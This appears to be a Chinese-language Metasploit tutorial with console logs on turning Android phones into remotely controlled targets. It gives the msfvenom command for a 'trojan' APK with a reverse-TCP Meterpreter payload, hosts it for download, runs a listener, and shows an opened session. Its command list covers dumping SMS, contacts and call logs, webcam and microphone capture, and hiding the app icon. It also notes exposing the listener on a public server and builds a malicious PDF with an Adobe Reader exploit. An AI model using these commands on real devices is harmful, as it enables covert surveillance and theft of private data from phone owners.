使用Metasploit 生成木马apk
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=4444 R > /root/webTest/test.apkLHOST是接受反弹的shell
LPORT是监听的端口
如果把地址指向公网服务器,通过端口映射,转发流量就可实现远程的控制.
启动apache服务
service apache2 start 访问http://ip/test.apk 下载木马
启动 postgresql
service postgresql start
启动 msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(multi/handler) > show payloads
太多载荷 省略了...
msf exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (android/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(multi/handler) > set LHOST 192.168.1.105
msf exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 192.168.1.105:4444
在android 安装apk 运行
[*] Started reverse TCP handler on 192.168.1.105:4444
[*] Sending stage (70525 bytes) to 192.168.1.106
[*] Meterpreter session 2 opened (192.168.1.105:4444 -> 192.168.1.106:40804) at 2018-10-12 22:50:21 +0800
meterpreter > 连接成功!
meterpreter > sysinfo
Computer : localhost
OS : Android 4.4.2 - Linux 3.10.30-00002-g71dd235 (armv7l)
Meterpreter : dalvik/androidmeterpreter > shell
Process 1 created.
Channel 1 created.
id
uid=10098(u0_a98) gid=10098(u0_a98) groups=1015(sdcard_rw),1023(media_rw),1028(sdcard_r),3003(inet),50098(all_a98) context=u:r:untrusted_app:s0下载通话记录 查看短信 摄像头的选择 等等
使用help查看相关功能
meterpreter > help
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
guid Get the session GUID
help Help menu
info Displays information about a Post module
irb Open an interactive Ruby shell on the current session
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
pry Open the Pry debugger on the current session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
sessions Quickly switch to another session
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session.
transport Change the current transport mechanism
use Deprecated alias for "load"
uuid Get the UUID for the current session
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
cp Copy source to destination
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lls List local files
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
ifconfig Display interfaces
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
execute Execute a command
getuid Get the user that the server is running as
localtime Displays the target system's local date and time
pgrep Filter processes by name
ps List running processes
shell Drop into a system command shell
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
screenshot Grab a screenshot of the interactive desktop
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Stdapi: Audio Output Commands
=============================
Command Description
------- -----------
play play an audio file on target system, nothing written on disk
Android Commands
================
Command Description
------- -----------
activity_start Start an Android activity from a Uri string
check_root Check if device is rooted
dump_calllog Get call log
dump_contacts Get contacts list
dump_sms Get sms messages
geolocate Get current lat-long using geolocation
hide_app_icon Hide the app icon from the launcher
interval_collect Manage interval collection capabilities
send_sms Sends SMS from target session
set_audio_mode Set Ringer Mode
sqlite_query Query a SQLite database from storage
wakelock Enable/Disable Wakelock
wlan_geolocate Get current lat-long using WLAN informatioandroid 漏洞利用
msf > search android
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/android/google_play_store_uxss_xframe_rce normal Android Browser RCE Through Google Play Store XFO
auxiliary/dos/android/android_stock_browser_iframe 2012-12-01 normal Android Stock Browser Iframe DOS
auxiliary/gather/android_browser_file_theft normal Android Browser File Theft
auxiliary/gather/android_browser_new_tab_cookie_theft normal Android Browser "Open in New Tab" Cookie Theft
auxiliary/gather/android_htmlfileprovider normal Android Content Provider File Disclosure
auxiliary/gather/android_object_tag_webview_uxss 2014-10-04 normal Android Open Source Platform (AOSP) Browser UXSS
auxiliary/gather/android_stock_browser_uxss normal Android Open Source Platform (AOSP) Browser UXSS
auxiliary/gather/firefox_pdfjs_file_theft normal Firefox PDF.js Browser File Theft
auxiliary/gather/samsung_browser_sop_bypass 2017-11-08 normal Samsung Internet Browser SOP Bypass
auxiliary/scanner/sip/sipdroid_ext_enum normal SIPDroid Extension Grabber
auxiliary/server/android_browsable_msf_launch normal Android Meterpreter Browsable Launcher
auxiliary/server/android_mercury_parseuri normal Android Mercury Browser Intent URI Scheme and Directory Traversal Vulnerability
exploit/android/adb/adb_server_exec 2016-01-01 excellent Android ADB Debug Server Remote Payload Execution
exploit/android/browser/samsung_knox_smdm_url 2014-11-12 excellent Samsung Galaxy KNOX Android Browser RCE
exploit/android/browser/stagefright_mp4_tx3g_64bit 2015-08-13 normal Android Stagefright MP4 tx3g Integer Overflow
exploit/android/browser/webview_addjavascriptinterface 2012-12-21 excellent Android Browser and WebView addJavascriptInterface Code Execution
exploit/android/fileformat/adobe_reader_pdf_js_interface 2014-04-13 good Adobe Reader for Android addJavascriptInterface Exploit
exploit/android/local/futex_requeue 2014-05-03 excellent Android 'Towelroot' Futex Requeue Kernel Exploit
exploit/android/local/put_user_vroot 2013-09-06 excellent Android get_user/put_user Exploit
exploit/multi/hams/steamed 2018-04-01 manual Steamed Hams
exploit/multi/handler manual Generic Payload Handler
exploit/multi/local/allwinner_backdoor 2016-04-30 excellent Allwinner 3.4 Legacy Kernel Local Privilege Escalation
payload/android/meterpreter/reverse_http normal Android Meterpreter, Android Reverse HTTP Stager
payload/android/meterpreter/reverse_https normal Android Meterpreter, Android Reverse HTTPS Stager
payload/android/meterpreter/reverse_tcp normal Android Meterpreter, Android Reverse TCP Stager
payload/android/meterpreter_reverse_http normal Android Meterpreter Shell, Reverse HTTP Inline
payload/android/meterpreter_reverse_https normal Android Meterpreter Shell, Reverse HTTPS Inline
payload/android/meterpreter_reverse_tcp normal Android Meterpreter Shell, Reverse TCP Inline
payload/android/shell/reverse_http normal Command Shell, Android Reverse HTTP Stager
payload/android/shell/reverse_https normal Command Shell, Android Reverse HTTPS Stager
payload/android/shell/reverse_tcp normal Command Shell, Android Reverse TCP Stager
post/android/capture/screen normal Android Screen Capture
post/android/gather/sub_info normal extracts subscriber info from target device
post/android/gather/wireless_ap normal Displays wireless SSIDs and PSKs
post/android/manage/remove_lock 2013-10-11 normal Android Settings Remove Device Locks (4.0-4.3)
post/android/manage/remove_lock_root normal Android Root Remove Device Locks (root)
post/multi/gather/wlan_geolocate normal Multiplatform WLAN Enumeration and Geolocation
post/multi/manage/play_youtube normal Multi Manage YouTube Broadcast
post/multi/manage/set_wallpaper normal Multi Manage Set Wallpaper
post/multi/recon/local_exploit_suggester normal Multi Recon Local Exploit Suggester
PDF木马
msf exploit(android/fileformat/adobe_reader_pdf_js_interface) > set LHOST 192.168.1.105
LHOST => 192.168.1.105
msf exploit(android/fileformat/adobe_reader_pdf_js_interface) > show options
Module options (exploit/android/fileformat/adobe_reader_pdf_js_interface):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.pdf yes The file name.
PDF::Encoder ASCIIHEX yes Select encoder for JavaScript Stream, valid values are ASCII85, FLATE, and ASCIIHEX
PDF::Method DOCUMENT yes Select PAGE, DOCUMENT, or ANNOTATION
PDF::MultiFilter 1 yes Stack multiple encodings n times
PDF::Obfuscate true yes Whether or not we should obfuscate the output
Payload options (android/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.105 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
**DisablePayloadHandler: True (RHOST and RPORT settings will be ignored!)**
Exploit target:
Id Name
-- ----
0 Android ARM
msf exploit(android/fileformat/adobe_reader_pdf_js_interface) > exploit
[*] Generating Javascript exploit...
[*] Creating PDF...
[+] msf.pdf stored at /root/.msf4/local/msf.pdf